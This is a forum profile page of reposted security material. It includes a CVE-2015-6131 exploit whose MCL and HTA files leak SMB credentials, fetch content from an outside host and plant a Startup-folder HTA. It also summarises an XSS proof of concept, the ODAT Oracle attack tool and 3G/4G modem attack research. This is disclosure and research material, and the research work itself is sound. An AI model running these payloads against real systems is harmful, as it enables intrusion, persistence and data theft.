Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    [/FONT][/COLOR]Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131) Software Vendor: Microsoft Software version : MS Windows Media Center latest version on any Windows OS. Software Vendor Homepage: http://www.microsoft.com CVE: CVE-2015-6131 Exploit Author: Eduardo Braun Prado Vulnerability oficial discoverer: Zhang YunHai of NSFOCUS Security Team date: december 8, 2015 Vulnerability description: Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside Windows Media Center window, in the context of the local machine security zone of Internet Explorer browser. This in turn allows execution of arbitrary code using eg. ADO ActiveX Objects. AKA "self-executing" MCL files. exploit code below: ----------- self-exec-1.mcl ------------------------------------ <application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html> ------------------------------------------------------------ ----------self-exec-2.mcl-------------------------------------- <application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close(); </script></html> ---------------------------------------------------------- -----Create-recordsetfile.hta -------------- <html><body onload="aa()"> <script language="VBScript"> function aa() defdir="." alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"". Set c = CreateObject("ADODB.Connection") co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;" c.Open co set rs =CreateObject("ADODB.Recordset") rs.Open "SELECT * from recordsetdata.txt", c al=rs.Save(defdir & "\recordsetfile.txt") rs.close end function </script></body></html> ------------------------------------------------------------------------------- ---------recordsetdata.txt------------------------------------------ <html> <script>a=new ActiveXObject('Wscript.Shell')</script> <script>a.Run('calc.exe',1);</script> </html> -------------------------------------------------------------------[COLOR=#000000][FONT=Consolas] Sursa: https://www.exploit-db.com/exploits/38911/
  2. Nytro
    Check out our GitHub Repository for the latest development version [h=3]GPU Driver requirements:[/h] NV users require ForceWare 346.59 or later AMD users require Catalyst 14.9 or later [h=2]Features[/h] Worlds fastest password cracker Worlds first and only GPGPU based rule engine Free Open-Source Multi-GPU (up to 128 gpus) Multi-Hash (up to 100 million hashes) Multi-OS (Linux & Windows native binaries) Multi-Platform (OpenCL & CUDA support) Multi-Algo (see below) Low resource utilization, you can still watch movies or play games while cracking Focuses highly iterated modern hashes Focuses dictionary based attacks Supports distributed cracking Supports pause / resume while cracking Supports sessions Supports restore Supports reading words from file Supports reading words from stdin Supports hex-salt Supports hex-charset Built-in benchmarking system Integrated thermal watchdog 150+ Algorithms implemented with performance in mind ... and much more [h=2]oclHashcat Screenshot[/h] [h=2]Attack-Modes[/h] Straight * Combination Brute-force Hybrid dict + mask Hybrid mask + dict * accept Rules Link: oclHashcat - advanced password recovery
  3. Nytro
    RogueKillerPE Description RogueKillerPE is a PE parsing tool, able to show internal structure of executable files. It’s able to read either the memory image (process module) or the disk image (filesystem) of a given executable. [TABLE] [TR] [TD] RogueKillerPE 32 bits Download 14 Mb [/TD] [TD] RogueKillerPE 64 bits Download 14 MB [/TD] [/TR] [/TABLE] Features: Open PE from file, and read disk image. Open PE from process, and read memory or disk image. Open file from command line. Drag and drop support. Process general information (pid, parent, …) File general information (attributes, size, …) Process module general information (address, size, …) A bunch of hashes (MD5, SHA1, SHA256, …) Process memory pages, with ability to dump. Injected pages detection, non-readable pages detection. Ability to dump injected pages to file. Hex code, with ability to search (hex values, or string ANSI/UNICODE). Assembly code, with ability to navigate. PE Headers (MZ, PE, Optional, …) RunPE detection, shows which header fields are modified. Checksum validation. PE Sections, with ability to watch hex code and dump to file. PE Imports, with ability to watch APIs assembly code (memory only). PE Exports, with ability to watch APIs assembly code. Hooks detection in imports/exports (table and inline hooks). PE Resources. Able to parse all well known types and display them accordingly (strings, version information, icons, …) Executable files detection in resources. Ability to watch hex code of resources. Ability to dump resources to file. PDB path detection. Strings scanner, with classification (Registry, files, …) Ability to dump all strings (by category or not) to file. User guide Start the tool. Drag a file on the interface, or load the process list. If you choose a file, there you go. If you choose a process, you can inspect a different module by selecting a new one in the modules list. If you choose a process, you can toggle disk/image and switch from process memory to disk image and vice-versa. Sursa: RogueKillerPE download
  4. Nytro
    Attacking HTTP/2 Implementations Introduction Yahoo Pentest Team members Stuart Larsen (@xc0nradx) and John Villamil (@day6reak) presented original research at Pacsec 2015 on the HTTP/2 protocol, its security implications, and flaws discovered in a number of implementations. Through this presentation, summarized below, we hope to make the protocol a more popular research target. What follows is a summary of our presentation given at Pacsec 2015 (slides). HTTP/2 is a new technology that is already seeing widespread use across the Internet. There has been little security research into this new protocol yet multiple implementations and widespread adoptions already exist. HTTP/2 lives in browsers, caching proxies, and libraries. It is the undisputed future of Internet connections and vulnerabilities in this protocol have the potential to cripple infrastructure. Our talk focused on threats, attack vectors, and vulnerabilities found during the course of our research. Two Firefox, two Apache Traffic Server (ATS), and four Node-http2 vulnerabilities will be discussed alongside the release of the first public HTTP/2 fuzzer. We showed how these bugs were found, their root cause, why they occur, and how to trigger them. We will also discuss http2fuzz, a fuzzer for both client and server endpoints of HTTP/2 connections. The fuzzer is open source and written in Go. It implements a large part of the HTTP/2 protocol and supports various frame types. It also includes a unique replay mechanism to help track down crash causing packets. We had previously blogged about two ATS bugs found by an earlier version of this fuzzer. Overview HTTP/1.1 came out back in 1999 and it was a huge step in bringing the web forward. But since then, websites have grown drastically, and HTTP had to be revisited. Today’s sites are much more complex with many more interconnected dependencies. ISP speeds have improved and more bandwidth is available. The changes from HTTP/1.1 to HTTP/2 are all about performance. The major changes are: - Binary Protocol / Compression - Multiplexing - Server Push - Frames But these new changes in functionality and complexity also introduce additional attack surface to HTTP implementations. HPACK Originally, HTTP was stateless. It followed a very simple model to make a request and receive a response. But that also means lots of redundant information is sent. HPACK (RFC7541) was released to address these and other issues. HPACK is a binary header compression protocol. It uses dynamic lookup tables to store and retrieve headers. Headers only need to be sent once, and are remembered for future requests on the same connection. This differential encoding saves space and time and is a huge improvement over the vanilla protocol. Frames Frames are the fundamental unit of communication within HTTP/2. Here is a typical HTTP/2 header visualized: There are 10 different types of frames: - Headers - Data - Priority - Reset - Settings - Push - Ping - Goaway - Update - Continuation To learn more about individual frames, checkout the RFC. Push Promise Push Promise is a new feature of HTTP/2 that allows you to push resources to a client before the client requests them. For example if a client requests /index.html, the server can probably assume the client will also want /logo.png. New Attack Surface - HPACK - Upgrades / Downgrades - Inconsistent Multiplexing - Malformed Frames - Pushing arbitrary data to client - Pushing arbitrary data to server - Stream dependencies - Invalid Frame States With all of this new attack surface we needed an automated way of getting good code coverage in HTTP2 implementations. For this we decided to build a new fuzzer. http2fuzz http2fuzz is a fuzzer written in golang for fuzzing HTTP/2 implementations in either server or client mode. It has a variety of strategies for both smart and dumb fuzzing. It can either rebuild valid frame structures with invalid data, or use completely random data. A big challenge in fuzzing is determining what payload actually caused the target to crash. We decided to build a replay feature that saves each frame that is sent. If a crash occurs, the replay list can be inspected and minimized to determine which payload was the cause of the crash. Bugs 1,2: Apache Traffic Server Our fuzzer discovered two remotely exploitable vulnerabilities in Apache Traffic Server. Both of these had the potential for arbitrary code execution. These bugs were covered in a previous blog post. Bug 3: Firefox HTTP/2 Malformed Header Frame DoS Normally a header frame consists of a pad length, stream dependency identifier, weight, block header fragment, and padding. If only a single byte is sent an integer underflow occurs which causes nsCString to try to allocate nearly 2^32 bytes of memory. HTTP2Session.cpp:1226 [1226]: self->mDecompressBuffer.Append(self->mInputFrameBuffer + kFrameHeaderBytes + paddingControlBytes + promiseLen , self->mInputFrameDataSize - paddingControlBytes - promiseLen - paddingLength); [1226]: self->mDecompressBuffer.Append(ptr + uint8_t(9) + uint8_t(0) + uint16_t(0) , uint32_t(1) - uint8_t(8) - uint32_t(5) - uint16_t(0)); As shown above, an underflow is caused in the second parameter of the buffer decompress. These issues were addressed by the Firefox developers. Bug 4: Firefox HTTP/2 Malformed Push Promise DoS This bug is very similar to the previous bug except it occurs inside push promise. HTTP2Session.cpp:1634 [1634]: self->mDecompressBuffer.Append(self->mInputFrameBuffer + kFrameHeaderBytes + paddingControlBytes + promiseLen , self->mInputFrameDataSize - paddingControlBytes - promiseLen - paddingLength); [1634]: self->mDecompressBuffer.Append(ptr + uint8_t(9) + uint8_t(1) + uint16_t(4) , uint32_t(76) - uint8_t(1) - uint32_t(4) - uint16_t(75)); Bugs 5-8: node-http2 We found a number of bugs inside node-http2 through fuzzing. Most of them involve buffer out of bound reads or invalid state handling within Javascript. These issues do not appear exploitable for arbitrary code execution but could be used to perform denial of service attacks against Node based web servers that use the package. https://github.com/molnarg/node-http2/issues/145 https://github.com/molnarg/node-http2/issues/146 https://github.com/molnarg/node-http2/issues/147 https://github.com/molnarg/node-http2/issues/148 [*] These issues have not been addressed by the project maintainers. The package no longer appears to be in active development. Conclusion HTTP/2 brings with it a lot of new attack surface. More research needs to be conducted on the implications of this protocol on web security. New tools need to be developed which handle the protocol and allow penetration testers to effectively audit HTTP/2 based web sites. Security products, including NIDS, will need to implement a subset of the protocol to effectively audit connections for malicious behavior or exploits. Lastly, more testing needs to be done on implementations of the protocol before they are enabled for popular use. Stuart Larsen and John Villamil of the Yahoo Pentest Team Sursa: http://yahoo-security.tumblr.com/post/134549767190/attacking-http2-implementations
  5. Nytro
    An Introduction to Image File Execution Options December 4, 2015 | BY Pieter Arntz Image File Execution Options (IFEO) are used for debugging. Malware, however, does not only check if there are debuggers active, but it’s also known to use the features IFEO has to offer to their own advantage. Intention IFEO settings are stored in the Windows registry. The intention of creating the IFEO registry key is to give developers the option to debug their software. This is relatively easy to do. Developers can attach any program to any executable using the registry key— HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\{name of the executable} —and adding the value “Debugger”=”{full path to the debugger}” For example, if you use Process Explorer, there is an option to “Replace Task Manager”: Articol complet: https://blog.malwarebytes.org/development/2015/12/an-introduction-to-image-file-execution-options/
  6. Nytro
    DEF CON 23 Conference - Runa Sandvik, Michael Auger - Hacking a Linux-Powered Rifle TrackingPoint is an Austin startup known for making precision-guided firearms. These firearms ship with a tightly integrated system coupling a rifle, an ARM-powered scope running a modified version of Linux, and a linked trigger mechanism. The scope can follow targets, calculate ballistics and drastically increase its user's first shot accuracy. The scope can also record video and audio, as well as stream video to other devices using its own wireless network and mobile applications. In this talk, we will demonstrate how the TrackingPoint long range tactical rifle works. We will discuss how we reverse engineered the scope, the firmware, and three of TrackingPoint's mobile applications. We will discuss different use cases and attack surfaces. We will also discuss the security and privacy implications of network-connected firearms. Speaker Bios: Runa A. Sandvik is a privacy and security researcher, working at the intersection of technology, law and policy. She is a technical advisor to both the Freedom of the Press Foundation and the TrueCrypt Audit Project, and a member of the review board for Black Hat Europe. Twitter: @runasand Michael Auger is an experienced IT Security specialist with extensive experience in integrating and leveraging IT security tools. He has leveraged a wide range of IT security solutions, integrating them, to deliver leading edge incident response and security operations capabilities.
  7. Nytro
    PHP 7.0 arrives, so go forth and upgrade if you dare ou get to play with a T_SPACESHIP operator, and much, much, more 3 Dec 2015 at 08:34, Jack Skinner PHP 7.0 was launched today, so we've asked @Sydphp organiser and #phunconf convener Jack Skinner to explain its significance. Over to you, Jack ... PHP is the language we love to hate and often hate to love. After celebrating it’s 20th birthday earlier this year, it's clearly here to stay, not least because version 7 arrived today. From humble beginnings as a dangerous thought from Rasmus, PHP has grown to a monolith by software standards; depending on which benchmark you believe, it drives up to 81 per cent of the web. The latest release has arguably taken the internals team eight years to complete, although many of the original features were rolled into existing stable releases. As work on unicode started to fray at the edges, the team decided to push core languages features into version 5.3, 5.4, and 5.5. The latest rendition of the 5 series will be around for another two years before being officially deprecated and off the security maintenance list. Because deprecating old versions has worked so far in the past (looks at Windows XP). Today's release was kickstarted again in late 2013 with the new internal engine dubbed ‘next gen’ or, for the less hipster among us, ‘phpng’. ng brought the engine almost up to par with competitor interpreters like hhvm from Facebook (which of course has out performed PHP core for many years). A years effort in 2014 more than doubled CPU and memory optimisation in the core engine and was eventually merged into core. Depending on which benchmarks you make yourself, PHP7 halves (or better) both memory and CPU instructions from the latest 5.6 releases. Even as pure marketing spiel, that's an impressive benchmark for a major language release. So version 6 was sent off to the glue factory, PHP 5 got the shiny new features and thus PHP7 got shiny new hotrod wheels and a confusing release number. It’s fast, so what? It's not just the new hot wheels look to the language that has web devs excited. PHP 7 also ships with a circus full of new features. For example, after 20 years the language is finally getting an internal Abstract Syntax Tree for static analysis. Something Java has had for, oh, about a decade. It’s also worth noting that with fond memories of PHP Sadness in our hearts there's also a much improved and more consistent variable syntax! Of course uniform variable syntax (as its known to the devs) breaks everything and naturally that’s PHP’s version of consistent, since the age old argument between array and string function arguments remains con...unchanged (what… did you expect a pun?) With so much changed, PHP 7 is almost certainly not backwards compatible with your existing code, especially if you’re running anything remotely legacy (yes, even you there with the ‘updated PHP 4 project). With many operators and corner cases being broken fixed, a long laborious task awaits any project unwilling or unable to provide decent test coverage. So much so that we’re predicting soapboxes will be in short supply as geeks announce their test suite coverage to the world in an attempt to upgrade. Finally a language that speaks my language! A lot of the debate that killed PHP v6 was the implementation of full, native unicode support and after so many years being unable to say hello world in emoji who can blame the team for wanting to update. It’s almost a non-issue now that PHP 7 can not only have the pile-of-poop emoji as a variable name, but also reliably use it as a string internally. A whole new release just for emoji fun! Since programmers are lazy there’s also a raft of new syntax additions, mostly around shortening of certain statements. In fact with new ?? ?: and <=> operators and shortened namespace syntax we’re wondering if PHP is slowly becoming the brainf*ck of the web. PHP 8 maybe? Shooting for the stars Releasing a new version should be easy right? Especially with the new perl-inspired (or for the script-hipsters among us, ruby inspired) T_SPACESHIP operator (no really, thats what PHP 7 calls <=> internally!). Quite a few projects, however, have been proactive over the last year; almost all the major frameworks and CMSs are claiming full compatibility with the new version at or close to launch. WordPress, for example, officially aims to have PHP 7 compatibility on or soon after release day, whereas Drupal has steamrolled straight ahead with the Drupal 8 launch last week and included PHP 7 out of the box. Unfortunately, here’s still no word from Joomla; they’re probably still recovering form last month’s global summit after-party. On the framework front, Zend Framework and Symfony have both announced their respective PHP 7 support, but naturally enterprise release cycles will slow down any adoption. At least the core projects maintain support. As with everything, your dependencies might take a while. #upgradecycledrama Go forth and upgrade! One would think after 20 years the team would have practice, but the internals team recently spent a few days playing “that's not a bug, THIS is a bug” and debating release day just a little longer. According to bug reports the count() function couldn’t count, which is fine if you're not planning to release it into the wild! Don’t worry, internals finally stopped throwing sand across the playground and agreed on an eighth release candidate before release. It's fixed now (I'm told). Upgrade to PHP7 on launch day? I, too, like to live dangerously! But with PHP 7 and its shiny new feature list coming to a repository near you, it’s safe to say PHP isn’t going the way of the dinosaur just yet. ® Sursa: http://www.theregister.co.uk/2015/12/03/php_70_arrives_complete_with_ttt_spaceshiptt_operator/
  8. Nytro
    [h=1]Malwarebytes Antivirus 2.2.0 - DoS PoC[/h] ##################################################################################### Application: Malwarebytes Antivirus Platforms: Windows Versions: 2.2.0. CVE: No CVE have been assigned Author: Francis Provencher of COSIG Twitter: @cosiG_ ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Malwarebytes Anti-Malware (MBAM) is an application for computers running under the Microsoft Windows and Apple OS Xoperating system that finds and removes malware.[3] Made by Malwarebytes Corporation, it was first released in January 2008. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash memory scanner. ([url]http://www.oracle.com/us/technologies/embedded/025613.htm[/url]) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-11-28: Francis Provencher of COSIG found the issue; 2015-11-30: Francis Provencher of COSIG report vulnerability to Malwarebytes; 2015-12-02: Malwarebytes release a patch for this issue; ##################################################################################### ============================ 3) Technical details ============================ When a malformed executable with an invalid integer (-1) in the “SizeOfRawData” in UPX section is parsed by Malwarebytes, a memory corruption occured. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. ##################################################################################### =========== 4) POC [url]https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38858.exe[/url] Sursa: https://www.exploit-db.com/exploits/38858/
  9. Nytro
    [h=1]IP.Board 4.1.4.x - Persistent XSS Vulnerability[/h] # Exploit Title: IP.Board Persistent XSS Vulnerability # Date: 29/10/2015 # Software Link: https://www.invisionpower.com/buy # Software version : 4.1.4.x # Exploit Author: Mehdi Alouache # Contact: mehdi.alouache@etu.univ-lehavre.fr # Category: webapps 1. Description Any registered user can execute remote javascript code by sending a private message to another user. The malicious JS code has to be written in the title of the message, and the receiver must have enabled the notifications when a new message is delivered. Note that the code will be directly executed as soon as the notification appear. (The receiver doesn't even need to check his inbox). 2. Proof of Concept Register on the forum (IP.Board) of a website as a regular user, and send a message to any user having the message notifications enabled. In the title field (and only here), a simple <script>alert(1)</script> will show a dialog box to the victim. 3. Solution: Patch the vulnerability with the (incoming) associated patch. -- ALOUACHE Mehdi Departement informatique Groupe A mehdi.alouache@hotmail.fr mehdi.alouache@etu.univ-lehavre.fr Sursa: https://www.exploit-db.com/exploits/38837/
  10. Nytro
    Nu. Daca ai acces de user obisnuit (limitat) pe un Windows si acest program e instalat, te poti folosi de el ca sa obtii privilegii de administrator. Ca sa iti protejezi site-ul e cam greu (imposibil). Poti verifica User-Agent-ul si diferite headere HTTP pe care le trimite, insa probabil se pot scoate sau modifica. Poti sa blochezi dupa un anumit numar de request-uri pe secunda dar se poate scana mai "lent". Poti sa blochezi IP-ul (de pe care se scaneaza) dupa un numar mare de erori (gen 404) dar se pot evita. Pe scurt, e mai simplu sa ai un site "sigur", decat sa te ascunzi de scannere web.
  11. Nytro
    http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf
  12. Nytro
    Oracle Database Attacking Tool ODAT linux standalone version at https://github.com/quentinhardy/odat-standalones ODAT ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely. Usage examples of ODAT: You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA) You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell) Tested on Oracle Database 10g, 11g and 12c(12.1.0.2.0). Features Thanks to ODAT, you can: search valid SID on a remote Oracle Database listener via: a dictionary attack a brute force attack ALIAS of the listener [*]search Oracle accounts using: a dictionary attack each Oracle user like the password (need an account before to use this attack) [*]execute system commands on the database server using: DBMS_SCHEDULER JAVA external tables oradbg [*]download files stored on the database server using: UTL_FILE external tables CTXSYS DBMS_LOB (NEW : 2014/07/28) [*]upload files on the database server using: UTL_FILE DBMS_XSLPROCESSOR DBMS_ADVISOR [*]delete files using: UTL_FILE [*]send/reveive HTTP requests from the database server using: UTL_HTTP HttpUriType [*]scan ports of the local server or a remote server using: UTL_HTTP HttpUriType UTL_TCP [*]capture a SMB authentication through: an index in order trigger a SMB connection [*]exploit the CVE-2012-313 (CVE-2012-3137 : The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 all) pickup the session key and salt for arbitrary users attack by dictionary on sessions [*]check CVE-2012-1675 (http://seclists.org/fulldisclosure/2012/Apr/204) [*]search in column names thanks to the search module: (NEW : 2015/03/17) search a pattern (ex: password) in column names [*]unwrap PL/SQL source code (10g/11g and 12c) Sursa: https://github.com/quentinhardy/odat
  13. Nytro
    Critical Vulnerabilities in 3G/4G Modems or how to build Big Brother This report is the continuation of "#root via SMS", a research made by the SCADA Strangelove team in 2014. It was devoted to telecommunications equipment vulnerabilities with modem flaws only partially covered. This document describes vulnerabilities found and exploited in eight popular 3G and 4G modems available in Russia and worldwide. The findings include Remote Code Execution (RCE) in web scripts, integrity attacks, Cross-Site Request Forgery (CSRF), and Cross-Site Scripting (XSS). The research covers a full range of attacks against carrier customers using these types of modems — device identification, code injection, PC infection, SIM card cloning, data interception, determining subscriber location, getting access to user accounts on the operator's website, and APT attacks. Equipment We analyzed eight modems of the following vendors: Huawei (two different modems and a router) Gemtek (a modem and a router) Quanta (two modems) ZTE (one modem) Not all the modems had vulnerabilities in their factory settings; some of them appeared after the firmware was customized by the service provider. For convenience, let's call all the network equipment — both modems and routers — collectively, "modems". Statistics on Vulnerable Modems The data was gathered passively from SecurityLab.ru between 01/29/2015 and 02/05/2015 (one week). Our statistics lacks information about Huawei modems, but it can be easily found at shodan.io: Vulnerabilities Detected All the modem models investigated had critical vulnerabilities leading to complete system compromise. Virtually all the vulnerabilities could be exploited remotely (see the "Modems" table). Description of the detected vulnerabilities ranked by severity: 1. RCE (five devices) All the modem web servers are based on simple CGI scripts that are not properly filtrated (except for Huawei modems, and even then only after a few security updates since the vulnerabilities have been disclosed). All the modems work with the file system — they need to send AT commands, read and write SMS messages, configure firewall rules, etc. Almost no devices had CSRF protection, which allowed remote code execution by power of social engineering and remote requests through a malicious website. Some modems were also vulnerable to XSS attacks. Combined, these three factors produce a disappointing result — more than 60% of the modems are vulnerable to Remote Code Execution. You could get an updated firmware without all found vulns for only Huawei modems (there's a public description of the vulnerabilities). The other vulnerabilities are still considered to be zero-day. 2. Integrity Attacks (six devices) Only three modems were protected against arbitrary firmware modifications. Two of them had the same integrity check algorithms (asymmetrically encrypted SHA1 with RSA digital signature), and the third one used the RC4 stream cipher for firmware encryption. All the cryptographic algorithms proved to be vulnerable to attacks violating integrity and confidentiality. In the former case, we can modify the firmware by injecting an arbitrary code. In the latter case, given the weak implementation of the algorithm, we managed to extract the encryption key and determine the encryption algorithm, which also allows firmware modification. The other three modems had no protection from integrity attacks, but a local access to COM interfaces was required to update the firmware. The remaining two modems could be updated only though the carrier's network via Firmware Over-The-Air (FOTA) technology. 3. CSRF (five devices) CSRF attacks can be used for various purposes, but the primary ones are remote upload of modified firmware and successful arbitrary code injection. Using unique tokens for each request is an efficient protection against this type of attacks. 4. XSS (four devices) The scope of this attack is quite wide — from host infection to SMS interception. However, our research focuses mainly on its prime target — modified firmware upload bypassing AntiCSRF checks and the Same-Origin Policy. Attack Vectors 1. Identification First, you need to identify a modem for a successful attack. You can send all kinds of requests to exploit RCE or try to upload various updates via all the possible addresses, but it seems to be inefficient and too signally for a target user. The time of infection — from user detection to code injection, modification of modem settings, etc. — is also quite important in the real (not simulated) conditions. For this very reason, you need to identify the target device properly. To do that, you must use a simple set of picture addresses, which can tell you the model of the modem. This method helped us to identify all the investigated modems 100%. An example of the code: 2. Code Injection This stage is described in the previous section, points 1 and 2. The code can be injected either though RCE in web scripts, or though uploading infected firmware. The first method allowed us to penetrate five modems, it isn't that complicated. Let's describe the vectors of the second method in detail. Two modems used the same algorithm to protect firmware integrity: the digital signature of SHA1 hash sum by an asymmetric RSA key was carried out via an OpenSSL library. The verification was incorrect: after uploading the firmware (an archive), the web server extracted two main files from it — the one specifying the size of the verified data and the one with the signed hash sum. Next, the verification script obtained a public key from the file system and sent a request to OpenSSL functions to decrypt signature and compare hashsum. If hashsums were the same, the update was installed. The firmware compression algorithm had a feature — you could add additional files with the same names to the archive, but its first bytes wouldn't change. In addition, when we extracted the firmware, the later files overrode the earlier files. This allows changing the firmware without affecting data integrity checks. The firmware of the third modem was encrypted by the RC4 algorithm with a constant keystream. As there were three different firmware versions on the Internet, you could get several bytes of plain text where there were bytes 0x00 in a file of the unencrypted firmware. Then, we extracted the ISO image of the modem's virtual CDROM, which allowed us to decipher the first several kilobytes of the each firmware image. They contained the encryption algorithm and address of the encryption key. By XORing the two pieces of firmware, we obtained the plain text of the key itself. Dmitry Sklyarov, an experienced cryptanalyst and reverse engineer from Positive Technologies, helped us a lot to conduct attacks against cryptographic protocols. You can use CSRF for remote upload and HTML5 functions for transferring multipart/form-data, or XSS if an application is protected against CSRF (Huawei modem). Only three Huawei modems had this kind of protection, which could be bypassed via XSS, though. In all other cases, an attacker could use the HTML5 code located on a special web page (you can download an example fromhttp://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html). Gemtek modems required a special utility for firmware updates installed on PC. In this case, firmware was uploaded though host internet connection via HTTP. After that, the firmware integrity was verified by checksums uploaded from the server. We failed to test this scenario. However, it’s no use hoping that a vendor that doesn't properly check firmware integrity during upload protects it well enough. 3. Data Interception Now we can execute an arbitrary code on the modem. You need to do three things: determine the modem’s location (later you will understand why) plus be able to intercept SMS messages and HTTP/HTTPS traffic. The easiest way to determine location is to find the base station identifier (CellID). Then, with the operator’s MCC and MNC at hand, you can determine the victim’s exact location by means of some public bases, such as opencellid.org. Another method is to use the modem’s Wi-Fi card to scan nearby networks and determine the victim’s location area more accurately, given that one base station may have quite a broad coverage. We managed to obtain the CellID of six modems; Wi-Fi was available in two devices. We had to recompile and upload new network card drivers for one of the modems. Its previous driver allowed only the Ad Hoc mode, which prevents scanning nearby APs. We studied two types of modems: with and without SMS support. The first type also didn’t allow SMS reading though AT commands. The second type allowed SMS reading via XSS. The messages are usually stored in the file system, and it’s not so difficult to get access to them for reading or sending SMS messages and USSD requests. Traffic interception is more interesting. There are several ways to do that: by changing the modem’s DNS server settings, or replacing the modem’s gateway with the Wi-Fi interface and connecting to an hacker’s access point (that’s why you should know the victim’s location). The first method is simpler: changing the settings is a piece of cake, as they are also stored in the file system. We managed to do that for all but one modem. We studied the second method only in theory — switching the network card mode from ad hoc to active, connecting to an access point, and changing modem routing. Not only HTTP traffic can be intercepted. By injecting and executing a VBS code on an HTML page, you can add your certificate to the Trusted Root Certification Authorities and successfully conduct MITM attacks: 4. SIM Card Cloning and 2G Traffic Interception The attacks against SIM card applications were described in detail by Karsten Nohl and in the “#root via SMS” research. We still have to send binary SMS messages to SIM cards, as we failed to make modems send commands to SIM card applications via APDU. It’s not that bad, though — by injecting an arbitrary code to a modem, you can extend the attack scope by means of binary SMS messages. Firstly, you can now send these messages “to yourself” from the target SIM card via the AT interface by switching the modem to the test mode and working with the COM port. You can do that in the background —the web interface will be available to the victim, who will hardly notice mode changeover. Secondly, you need to exchange data with the COM port via injecting a VBS code to the modem page and executing it with user rights with the help of social engineering. Switching the modem to the test mode The PowerShell script for sending a binary SMS message Using FakeBTS is the next attack vector, and you also need to know the victim’s location for it. Having the victim’s exact location and IMSI at hand, we can use a fake base station nearby and wait until the subscriber connects to us, or we can force a base station (it is possible for five devices). If the operation is successful, we will be able to send binary SMS messages to the target SIM card without any restrictions from the operator. 5. PC Infection If we penetrate a modem, we have very few attack vectors. However, infecting a PC connected to the modem provides us with many ways to steal and intercept the PC user's data. You may have already heard of the main infection vector — bad USB. There are also some other methods involving social engineering: Virtual CDROM. Almost all the modems have a virtual drive image that is enabled for driver installation. You need to replace the image and force its mounting. VBS, drive-by-download. Code injection to an HTML page, or forced upload of executable files as updates or “diag utilities”. Browser 0-days. As an example, we used Adobe Flash 0-day found in the archives of Hacking Team. Vulnerable client software. One of the operators delivered vulnerable diagnostic software together with its modems, which allowed executing an arbitrary code on Windows and OS X PCs. Reference: we'd like to give a special thanks to Mikhail Firstov from Headlight Security for detecting this vulnerability. Random Code Execution in the client software of a modem 6. APT Attacks After infecting the modem and host, you need to stay in the systems somehow — save changes in the modem's even after it is switched off and prevent further firmware updates. It would be useful to detect and infect other vulnerable modems as soon as they will be connected to the PC. Most of the devices can be infected right at the phone store during "checking before buying". There was another attack we failed to conduct — accessing the modem from the operator's network. Most vulnerable web servers listen at *:80, i.e. there's a chance that the modem's web server will be available from the operator's network. Only a few modems restrict connections incoming from the telecom's network or specify the address for listen 192.168.0.1:80. 7. Additional Information We also studied getting access to a personal account by sending a USSD request and resetting password via an SMS message. This vector was demonstrated during the "#root via SMS" presentation. The vulnerability was exploited through an XSS attack that could be conducted by sending an SMS message. However, an attacker can also do that in modems that allow SMS reading via RCE. XSS exploitation results Summary All in all, we have a full infection cycle of devices and related PCs. Using the infected devices, we can determine location, intercept and send SMS messages and USSD requests, read HTTP and HTTPS traffic (by replacing SSL certificates), attack SIM cards via binary SMS messages, and intercept 2G traffic. Further infection can continue through the operator's networks, popular websites or equipment infected by worms (when connecting a new device). What can we recommend to those clients who constantly work with such devices? Huawei modems with the latest firmware updates are the most protected. It is the only company that delivers firmware (the operators are only allowed to add some visual elements and enable/disable certain functions) and fixes vulnerabilities detected in its software. ? Modems Information Disclosure Although 90 days had left since the service providers were informed of the vulnerabilities, many flaws remained unfixed. Credits: Alexey Osipov, Dmitry Sklyarov, Kirill Nesterov, Mikhail Firstov, and the SCADA Strangelove team (http://scadasl.org) Author: Positive Research ?? 6:10 AM Sursa: http://blog.ptsecurity.com/2015/12/critical-vulnerabilities-in-3g4g-modems.html
      • 1
      • Upvote
  14. Nytro
